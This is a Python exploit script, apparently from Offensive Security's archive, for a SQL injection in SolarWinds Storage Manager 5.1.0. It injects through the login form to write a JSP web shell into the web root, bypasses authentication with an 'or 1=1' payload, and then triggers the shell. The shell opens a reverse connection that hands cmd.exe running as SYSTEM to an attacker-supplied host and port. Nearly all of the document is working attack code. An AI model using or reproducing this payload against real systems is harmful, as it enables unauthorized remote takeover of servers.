#!/usr/bin/python ###################################################################################### # Exploit Title: Solarwinds Storage Manager 5.1.0 Remote SYSTEM SQL Injection Exploit # Date: May 2nd 2012 # Author: muts # Version: SolarWinds Storage Manager 5.1.0 # Tested on: Windows 2003 # Archive Url : http://www.offensive-security.com/0day/solarshell.txt ###################################################################################### # Discovered by Digital Defence - DDIVRT-2011-39 ###################################################################################### import urllib, urllib2, cookielib import sys import random print "\n[*] Solarwinds Storage Manager 5.1.0 Remote SYSTEM SQL Injection Exploit" print "[*] Vulnerability discovered by Digital Defence - DDIVRT-2011-39" print "[*] Offensive Security - http://www.offensive-security.com\n" if (len(sys.argv) != 4): print "[*] Usage: solarshell.py " exit(0) rhost = sys.argv[1] lhost = sys.argv[2] lport = sys.argv[3] filename = '' for i in random.sample('abcdefghijklmnopqrstuvwxyz1234567890',6): filename+=i filename +=".jsp" output_path= "c:/Program Files/SolarWinds/Storage Manager Server/webapps/ROOT/%s" %filename jsp = '''<%@page import="java.lang.*"%> <%@page import="java.util.*"%> <%@page import="java.io.*"%> <%@page import="java.net.*"%> <% class StreamConnector extends Thread { InputStream is; OutputStream os; StreamConnector( InputStream is, OutputStream os ) { this.is = is; this.os = os; } public void run() { BufferedReader in = null; BufferedWriter out = null; try { in = new BufferedReader( new InputStreamReader( this.is ) ); out = new BufferedWriter( new OutputStreamWriter( this.os ) ); char buffer[] = new char[8192]; int length; while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 ) { out.write( buffer, 0, length ); out.flush(); } } catch( Exception e ){} try { if( in != null ) in.close(); if( out != null ) out.close(); } catch( Exception e ){} } } try { Socket socket = new Socket( "''' + lhost +'''", '''+lport+'''); Process process = Runtime.getRuntime().exec( "cmd.exe" ); ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start(); ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start(); } catch( Exception e ) {} %>''' jsp = jsp.replace("\n","") jsp = jsp.replace("\t","") prepayload = "AAA' " prepayload += 'union select 0x%s,2,3,4,5,6,7,8,9,10,11,12,13,14 into outfile "%s"' % (jsp.encode('hex'),output_path) prepayload += "#" postpayload = "1' or 1=1#--" loginstate='checkLogin' password = 'OHAI' cj = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) post_params = urllib.urlencode({'loginState' : loginstate, 'loginName' : prepayload,'password' : password}) print "[*] Sending evil payload" resp = opener.open("http://%s:9000/LoginServlet" %rhost, post_params) print "[*] Triggering shell" post_params = urllib.urlencode({'loginState' : loginstate, 'loginName' : postpayload,'password' : password}) resp = opener.open("http://%s:9000/LoginServlet" % rhost, post_params) resp = opener.open("http://%s:9000/%s" % (rhost,filename)) print "[*] Check your shell on %s %s\n" % (lhost,lport) # 01010011 01101100 01100101 01100101 01110000 01101001 01110011 01101111 # 01110110 01100101 01110010 01110010 01100001 01110100 01100101 01100100